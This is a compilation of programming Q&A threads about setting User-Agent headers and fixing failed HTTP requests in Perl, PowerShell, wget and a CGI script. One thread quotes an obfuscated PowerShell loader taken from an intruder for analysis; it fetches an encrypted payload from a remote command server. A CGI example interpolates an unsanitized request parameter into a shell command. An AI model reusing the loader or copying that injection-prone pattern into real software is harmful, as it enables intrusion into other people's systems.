We have a proxy server here, and all internet traffic goes through it. The command cpan <package> fails with the following error:
LWP failed with code[403] message[Browserblocked]
I think only specific browsers are allowed through the proxy server, so I need to set the user agent for cpan. Where can I set it? I don't see anything suitable in o conf.
Changing the code of site\lib\LWP\UserAgent.pm from
sub _agent { "libwww-perl/$VERSION" }
to
sub _agent { 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0' }
solves the problem, but is this really the official solution?
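If patching the installed module feels wrong (it gets overwritten on every LWP upgrade), a less invasive variant of the same trick is to put the override in a tiny wrapper module and load it only for cpan. A minimal sketch, assuming a file MyAgent.pm somewhere on @INC (the module name and the PERL5OPT idea are my own; _agent is a private LWP method, so this may break with future LWP versions):
# MyAgent.pm -- hypothetical wrapper that overrides LWP's default agent string
package MyAgent;
use LWP::UserAgent ();      # load the real module before redefining its sub
no warnings 'redefine';     # we are intentionally replacing _agent
sub LWP::UserAgent::_agent {
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0'
}
1;
Then set PERL5OPT=-MMyAgent in the environment before running cpan, and the installed UserAgent.pm stays untouched.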
I have added the CurlWget extension to my browser and tried to download data in a Jupyter notebook as below:
!wget --header="Host: storage.googleapis.com" --header="User-Agent: Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
OPR/66.0.3515.44" --header="Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,
application/signed-exchange;v=b3;q=0.9" --header="Accept-Language: en-US,en;q=0.9" --
header="Referer: https://www.kaggle.com/" "https://storage.googleapis.com/kagglesdsdata/competitions
/4117/46665/train.7z?GoogleAccessId=web-data#kaggle-161607.iam.gserviceaccount.com&Expires=1580049706&Signature=kowWRCMZZkqsrEqcwFtNJd4nwGgpE9DLbAcJ2b%2BvaGw1Wie82k3K03bhmHpqnhIKPsloHQJRq%2FHpBxv4kSeINAymvKvJXcpffjMqx%2Baujazoqxbl0aAQUhBs27OTKTqSp5Hzfhpz%2FKd%2Fx6SuYUCxy7x%2BAFOjlzQ8se59vJPwEmRNr4%2BSeOepC%2F%2BWJYzgLIcXDFy%2BUjjH1SrnBdAgRiMEa8pPD%2FZxmRma4ggWIWskLEVyuq4oAyVnaXK%2F39GsCo5lr199KqsPsO7BYJxs2hGv%2FlY6n4PirdQpw68dsSrLvfnSbpQckVVRtqjb9uLWDsQqarWfec1INAmHwaa%2B2Db2yQ%3D%3D&response-content-disposition=attachment%3B+filename%3Dtrain.7z" -O "train.7z" -c
But I am getting the error below:
'wget' is not recognized as an internal or external command, operable program or batch file.
I have installed wget using the command below:
pip install wget
This is probably not a satisfying answer, but the answer is: don't do this. CurlWget was flagged as malware and removed from the Chrome Web Store:
https://chrome.google.com/webstore/detail/curlwget/jmocjfidanebdlinpbcdkcmgdifblncg/support?hl=pt-BR&authuser=2
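Note also that the 'wget' is not recognized error is unrelated to the extension: pip install wget installs a Python module named wget, not the GNU wget executable, so Windows has nothing called wget on the PATH. If I remember the PyPI module's interface correctly, it can be invoked through the interpreter instead, e.g.:
!python -m wget "https://example.com/file.7z" -o train.7z
(the URL here is a placeholder; that module does not send the custom headers the signed Kaggle URL needs, so installing real GNU wget for Windows, or using the official Kaggle API, is likely the more robust route).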
My question: why does my Perl script, which succeeds from my home laptop, not work when run in the context of my hosting website? (Perhaps they have a firewall, for example. Perhaps my website needs to provide credentials. Perhaps this is in the realm of cross-site scripting. I don't know, and I'm asking for your help in understanding what the cause could be, and then the solution. Thanks!)
Note that everything works fine IF I run the Perl script from my laptop at home.
But if I upload the Perl script to my web host, where I have a web page whose JavaScript successfully calls that Perl script, an error comes back from the site whose URL is in the Perl script (finance.yahoo in this example).
To bypass the JavaScript, I'm just typing the URL of my Perl script, e.g. http://example.com/blah/script.pl
Here is the full error message from finance.yahoo when $url starts with http:
Can't connect to finance.yahoo.com:80 nodename nor servname provided, or not known at C:/Perl/lib/LWP/Protocol/http.pm line 47.
Here is the full error message from finance.yahoo when $url starts with https:
Can't connect to finance.yahoo.com:443 nodename nor servname provided, or not known at C:/Perl/lib/LWP/Protocol/http.pm line 47.
Code:
#!/usr/bin/perl
use strict; use warnings;
use LWP 6; # one site suggested loading this "for all important LWP classes"
use HTTP::Request;
### sample of interest: to scrape historical data and feed massaged facts to my private web page via js ajax
my $url = 'http://finance.yahoo.com/quote/sbux/profile?ltr=1';
my $browser = LWP::UserAgent->new;
# one site suggested having this empty cookie jar could help
$browser->cookie_jar({});
# another site suggested I should provide WAGuess
my @ns_headers = (
'User-Agent' =>
# 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Accept' => 'text/html, */*',
'Accept-Charset' => 'iso-8859-1,*,utf-8',
'Accept-Language' => 'en-US',
);
my $response = $browser->get($url, @ns_headers);
# for now, I just want to confirm, in my web page itself, that
# the target web page's contents were returned
my $content = $response->content;
# show such content in my web page
print "Content-type: text/html\n\n" . $content;
Well, it is not obvious what your final goal is, and it is possible that you are overcomplicating the task.
You can retrieve the above-mentioned page with simpler Perl code:
#!/usr/bin/env perl
#
# vim: ai:ts=4:sw=4
#
use strict;
use warnings;
use feature 'say';
use HTTP::Tiny;
my $debug = 1;
my $url = 'https://finance.yahoo.com/quote/sbux/profile?ltr=1';
my $response = HTTP::Tiny->new->get($url);
if ($response->{success}) {
    my $html = $response->{content};
    say $html if $debug;
}
else {
    # HTTP::Tiny puts the failure details in the response hash
    warn "Failed: $response->{status} $response->{reason}\n";
}
In your post you indicated that JavaScript is somehow involved; it is not clear how, or what its purpose is in retrieving the page.
The error message refers to C:/Perl/lib/LWP/Protocol/http.pm line 47, which indicates that the web hosting takes place on a Windows machine; it would be nice to state that in your question.
Could you shed some light on the purpose of the following block in your code?
# WAGuess
$browser->env_proxy;
# WAGuess
$browser->cookie_jar({});
I do not see cookie_jar being used anywhere in your code.
Do you plan to use some authentication approach to extract data under your personal account that is not otherwise accessible?
Please state in the first few sentences what you are trying to achieve, on a grand scale.
Perhaps it's about cookies, or about using Yahoo's "query" URL instead.
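If the immediate goal is simply to fetch the page from the host with a browser-like User-Agent, here is a minimal LWP sketch (the agent string is arbitrary, and env_proxy only helps if the host exposes its proxy via the usual http_proxy/https_proxy environment variables):
#!/usr/bin/env perl
use strict;
use warnings;
use LWP::UserAgent;

my $ua = LWP::UserAgent->new(
    agent   => 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
    timeout => 30,
);
$ua->env_proxy;   # honour proxy environment variables, if any

my $res = $ua->get('https://finance.yahoo.com/quote/sbux/profile?ltr=1');
die 'Request failed: ' . $res->status_line . "\n" unless $res->is_success;
print $res->decoded_content;
Note, though, that your "nodename nor servname provided, or not known" error is a name-resolution (DNS) failure, not a header problem; if the host cannot resolve finance.yahoo.com at all, no User-Agent will fix that, and you would need to ask the host about outbound access.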
Can someone please help me analyse this code?
[SYstem.NEt.SeRVICEPoiNtMAnagEr]::EXPecT100CONtinue=0;$wC=NEW-ObJECt SYsteM.NEt.WebCLiENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$wC.HEADerS.Add('User-Agent',$u);
$wC.PROxY=[SYstem.NEt.WeBReqUest]::DeFaULtWeBPrOxy;
$Wc.PRoXy.CRedEntiALS = [SYSTEM.NET.CReDENTiAlCaCHe]::DEFAULTNETwORkCREdENTIalS;
$Script:Proxy = $wc.Proxy;$K=[SYstem.TeXT.ENcodiNg]::ASCII.GetBYTEs('3c9825ffc1d70f40ec648606c637200d'); $R={$D,$K=$ARGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]}; $D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOr$S[($S[$I]+$S[$H])%256]}}; $ser='http://colo.myftp.org:4445';$t='/admin/get.php';$wC.HEadeRs.ADD("Cookie","session=R9rR6fhOaMdGNJI1saLgl2JtVSY="); $daTA=$WC.DOWnlOADDATa($SER+$T); $IV=$DATa[0..3];$DaTA=$dATa[4..$dATa.lENGTH];
-JOiN[ChAR[]](& $R $dAta ($IV+$K)) write-host $R
Someone has been trying to access my system; I just extracted some code blocks from their application.
I'm having a little problem that looks very simple... but I just don't get it!
I'm trying to download the website content of http://cspsp.gshi.org/ (if you try to access it via www.cspsp.gshi.org you get the wrong page).
For this I do the following in PowerShell:
(New-Object System.Net.WebClient).DownloadFile( 'http://cspsp.gshi.org/', 'save.htm' )
I can access the website with Firefox and download its contents easily, but PowerShell always outputs something like this:
The remote server returned an error: (404) Not Found. (translated from German)
I'm not sure what I'm doing wrong here. Other websites like Google work just fine.
It appears that the site relies on the User-Agent request header sent by HTTP clients, and that System.Net.WebClient doesn't send even a default value (at least, it didn't when I hit my own local servers).
Either way, this worked for me:
$request = (New-Object System.Net.WebClient)
$request.headers['User-Agent'] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.40 Safari/537.17"
$request.DownloadFile('http://cspsp.gshi.org/', 'saved.html')
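As a side note, on PowerShell 3.0 or newer you can do the same with Invoke-WebRequest, which accepts the agent string directly (untested against this particular site, but the cmdlet and its -UserAgent parameter are standard):
Invoke-WebRequest -Uri 'http://cspsp.gshi.org/' -UserAgent 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.40 Safari/537.17' -OutFile 'saved.html'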
I'm trying to output an image from RRDtool using Perl. I've posted the relevant part of the CGI script below:
sub graph
{
my $rrd_path = $co->param('rrd_path');   # $co is the CGI.pm object, created elsewhere in the script
my $RRD_DIR = "../data/";
# generate a PNG from the RRD
my $png_filename = "-"; # a '-' as the filename sends the PNG to stdout
my $rrd = "$RRD_DIR/$rrd_path";
my $png = `rrdtool graph $png_filename -a PNG -r -l 0 --base 1024 \\
    --start -151200 --vertical-label 'bits per second' --width 500 --height 200 \\
    DEF:bytesInPerSec=$rrd:bytesInPerSec:AVERAGE \\
    DEF:bytesOutPerSec=$rrd:bytesOutPerSec:AVERAGE \\
    CDEF:sbytesInPerSec=bytesInPerSec,8,* \\
    CDEF:sbytesOutPerSec=bytesOutPerSec,8,* \\
    AREA:sbytesInPerSec#00cf00:AvgIn \\
    LINE1:sbytesOutPerSec#002a97:AvgOut \\
    VRULE:1246428000#ff0000:`;
#print the image header
use bytes;
print $co->header(-type=>"image/png",-Content_length=>length($png));
binmode STDOUT;
print $png;
}#end graph
This works fine on the command line (perl graph.cgi > test.png, with the header commented out, of course), as well as through the browser on my Ubuntu 10.04 development machine. However, when I move it to the CentOS 5 production server it doesn't, and the browser receives a content length of 0:
Ubuntu 10.04/Apache:
Request URL:http://noc-student.nmsu.edu/grasshopper/web/graph.cgi
Request Method:GET
Status Code:200 OK
Request Headers
Accept:application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Cache-Control:max-age=0
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.36 Safari/534.7
Response Headers
Connection:Keep-Alive
Content-Type:image/png
Content-length:12319
Date:Fri, 08 Oct 2010 21:40:05 GMT
Keep-Alive:timeout=15, max=97
Server:Apache/2.2.14 (Ubuntu)
And from the CentOS 5/Apache server:
Request URL:http://grasshopper-new.nmsu.edu/grasshopper/branches/michael_dev/web/graph.cgi
Request Method:GET
Status Code:200 OK
Request Headers
Accept:application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Cache-Control:max-age=0
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.36 Safari/534.7
Response Headers
Connection:close
Content-Type:image/png
Content-length:0
Date:Fri, 08 Oct 2010 21:40:32 GMT
Server:Apache/2.2.3 (CentOS)
The use bytes and manual setting of the content length are in there to try to fix the problem, but it's the same without them. Same with setting binmode on STDOUT. The script works fine from the command line on both machines.
See my answer to How can I troubleshoot my Perl CGI program? Typically, the difference between running your program on the command line and from the web server is a matter of different environments. In this case I'd expect that either rrdtool is not in the PATH or the web server user can't run it.
The backticks only capture standard output. There is probably some standard error output in the web server error log.
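For example, a minimal sketch of that check (the 2>&1 redirect and the $? exit-status test are generic shell/Perl debugging, not specific to this script; the ... stands for the original graph arguments):
my $png = `rrdtool graph - -a PNG ... 2>&1`;   # fold stderr into the captured output
if ($? != 0) {
    # non-zero exit: $png now holds rrdtool's error text instead of PNG data
    die "rrdtool failed (exit " . ($? >> 8) . "): $png";
}
With the redirect in place, whatever rrdtool writes to standard error becomes visible instead of silently yielding a zero-length body. Just remember to drop the 2>&1 again once it works, or any warnings will corrupt the image data.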
Are you sure your web user has access to your data? Try having the CGI write the PNG to the filesystem, so you can make sure it's generated properly. If it is, the problem is in the transmission (headers, encodings, etc.). If not, it's unrelated to the web server and probably related to permissions.